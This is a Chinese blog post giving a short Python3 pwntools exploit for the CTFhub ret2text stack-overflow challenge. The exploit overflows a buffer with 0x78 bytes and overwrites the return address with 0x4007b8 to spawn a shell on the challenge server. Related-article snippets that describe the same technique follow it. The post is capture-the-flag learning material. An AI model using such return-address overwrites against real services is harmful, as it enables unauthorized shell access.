CTFhub 技能树 PWN ret2text Python3 exp

最新推荐文章于 2025-03-31 10:25:31 发布
原创 最新推荐文章于 2025-03-31 10:25:31 发布 · 1.2k 阅读 · 2 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。

博客给出CTF栈溢出题目链接及WP链接,作者搜exp时发现已有WP,但原程序用Python2编写,而自己的pwntools环境是Python3,需对程序稍作修改。
部署运行你感兴趣的模型镜像

题目链接:https://www.ctfhub.com -> 技能树 -> PWN -> 栈溢出 -> ret2text
WP:https://writeup.ctfhub.com/Skill/Pwn/%E6%A0%88%E6%BA%A2%E5%87%BA/eeca3548.html


搜exp的时候发现已经有人写过WP了,于是就Cirl+CV,发现原程序是用Python2写的,我的pwntools环境是Python3,因此程序需要稍作修改。

from pwn import *

host = 'challenge-23b7868abfc49eea.sandbox.ctfhub.com'
port = 31443

#p = process("./pwn")
p = connect(host, port)
payload = bytes('A',encoding="utf8") * 0x78 + p64(0x4007b8)#类型不同不能拼接
p.sendline(payload)
p.interactive()

END

您可能感兴趣的与本文相关的镜像

Python3.8

Python3.8

Conda
Python

Python 是一种高级、解释型、通用的编程语言,以其简洁易读的语法而闻名,适用于广泛的应用,包括Web开发、数据分析、人工智能和自动化脚本

CTFhub-pwn-[ret2text]-writeup
m0_43405474的博客
08-26 2395
关于CTF pwn的简单入门题目,ret2text
CTFHub技能树---pwn-Chunk Extend
saulgoodman的博客
02-07 652
add这里如果 index 0 ~ 9 都申请了的 chunk ,那么 i = 10 再退出 for 循环,但是还会接下去利用 ptr[10] = malloc(ptr[20]) 申请chunk,实现 index 0 的堆块溢出。最后第11个chunk的size会变成非常大,编辑chunk0,就可以实现溢出。也就是add 可以覆盖掉一个第一个 chunk 的 size。
CTFHUB技能树——Pwn前置技能学习
QX_XDE的博客
04-24 1633
汇编指令讲解
CTFHUB(PWN)Ret2Text
Rt1Text的博客
02-02 4488
64位没有开启任何保护的Ret2Text
[CTFHub] ret2text
Lucien_Carr的博客
04-14 1207
gets_s(buffer,size)函数:从标准输入中读取数据,size表示的最多读取的数量,在这里是argv,没有定义是多大,所以我们就可以无限的输入。输入超过程序设定的字节数以后,就会发生栈溢出,多出的内容会覆盖返回地址。这个题目中要获得系统的shell,只需要先用垃圾数据填充填满数组的空间,再拼上系统system函数的返回地址就可以。只要我们能控制程序返回到0x4007B8(“/bin/sh”指令的地址),就可以得到系统的shell。我们攻击的目的主要是获得系统的控制权(也就是拿到shell)。
[PWN] CTF-WIKI ret2text
qq_46441427的博客
02-06 645
ret2text 首先我们打开题目,checksec一下,主要是查看一下该程序是多少位的,并了解其保护机制 32位的小端位程序,没有开启canary堆栈保护及NX,于是我们用32位ida打开 我们打开ida-32,看到源码,发现了一个get函数,这属于我们常说的危险函数 在函数框,我们找到了一个secure函数,调出来,发现有一个system("/bin/sh")函数 这个时候,我们只需要知道调用system函数的指令的地址,然后当get函数执行时我们把get函数的ret上准备ret的地址换成调用syst
CTFWIKI-PWN-ret2syscall
m0_64180167的博客
04-19 727
该题目是在32位下。
网络攻防快速入门笔记pwn | 02 栈溢出题型 | 2.1 ret2textret2shellcode
qq_41040989的博客
03-31 1093
将返回地址覆盖为程序.text段中已有代码的地址,从而执行本身的代码,由于我们要获得shell,二进制文件中本身就含有一个可以直接获取权限的函数,然后我们通过栈溢出漏洞,控制程序执行留,将返回地址覆盖为这个函数的地址让文件运行这个获取权限的函数,我们就可以拿到权限,进而获取flag。程序会把栈的地址输出,然后我们接收程序输出的栈地址,然后向栈中输入shellcode,通过栈溢出跳到输入shellcode的位置,最终获取shell。获取到系统权限之后,就可以输入相应的linux命令,一般用到。
PWN · ret2text | 伪rand()】[HDCTF 2023]pwnner
Mr_Fmnwon的博客
07-26 1123
一道简单的ret2text,加上一些伪随机的知识,对于本蒟蒻萌新来说,比较新,值得记录。伪随机数以及ctypes库的使用!
ctfhub 技能树pwn 栈溢出 ret2text
m0_75234353的博客
03-29 1177
看到v4这个变量的缓冲区,我们要把数据溢出到覆盖返回地址,即0x70+8。选中该行,看到下方的地址(4007B8)看到gets危险函数,再点开其中的v4。再shift+f12 直接查看相关字符。可以看到无任何的栈保护。输入:wq 保存退出。
PWN · ret2text】——[CTFHub]ret2text
Mr_Fmnwon的博客
04-20 4031
经典的ret2text流程。
CTFHub 栈溢出 ret2text exp代码
柠檬i的博客
10-09 2062
CTFHub 栈溢出 ret2text exp代码
[CTFHub]-技能树----pwn tcache Attack
saulgoodman的博客
02-02 368
目前只有我一人解出来,估计是其他大佬不屑于做这样简单的题吧!长话短说,做堆类题一定要亲自动手,重要的事情说三遍。
CTFHub技能树-----pwn off by null
saulgoodman的博客
02-03 383
【代码】CTFHub技能树-----pwn off by null。
pwn ret2text
young‘s blog
02-06 1633
好久没有博客了,今天记录一下做ctf-wiki上ret2text的过程,也记录一下学到的东西,一点一点积累成长。 地址:ctf-wiki 源程序也在里面 边看视频边学的,视频地址为: ret2text 程序下载好之后通过checksec查看保护措施: 没有开启canary,32位动态链接程序 知道程序的基本信息后运行一下程序,看看程序都有什么功能。 测试后得知只有一个输入点。 拖进ida分析一下...
CTFHub[PWN技能树]——栈溢出
mcmuyanga的博客
12-19 3135
文章目录一、ret2text二、ret2shellcode 一、ret2text 例行检查,64位程序,没有开启任何保护 本地运行一下情况,看看大概的情况 64位ida载入,检索程序里的字符串发现了bin/sh 要满足条件才可以执行,但是我们可以直接跳转到0x4007B8去system(‘/bin/sh’) 看main函数 第8行,gets函数读入没有限制数据的长度,明显的溢出,溢出ret到执行system(‘/bin/sh’)的地址即可 from pwn import * #p=proc
【ctf】ret2text
woodwhale的博客
04-17 6304
PWN ret2text 题目链接:ret2text 参考博客:CTF Wiki 基本 ROP 参考视频:【CTF】Linux PWN入门 Bamboofox社课系列 0x01 下载ret2text文件,复制到 翔哥的van美pwn机 中 查看保护机制 Arch: i386-32-little //文件为32位程序 RELRO: Partial RELRO Stack: No canary found //未开启canary保护 NX: NX enabled
CTFHUB-PWN-ret2text
m0_64180167的博客
04-16 232
然后我们可以开始payload。下载文件 checksec看看。然后看看shell的地址是多少。放入ida64 查看字符串。然后看看主函数怎么输入。
ret2libc要求的python版本
最新发布
04-03
嗯,用户问的是ret2libc攻击所需的Python版本。首先,我需要回忆一下ret2libc的基本概念。这是一种缓冲区溢出攻击技术,用于绕过NX(不可执行内存)保护。攻击者利用已加载的库函数,如libc中的system函数,来执行...
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值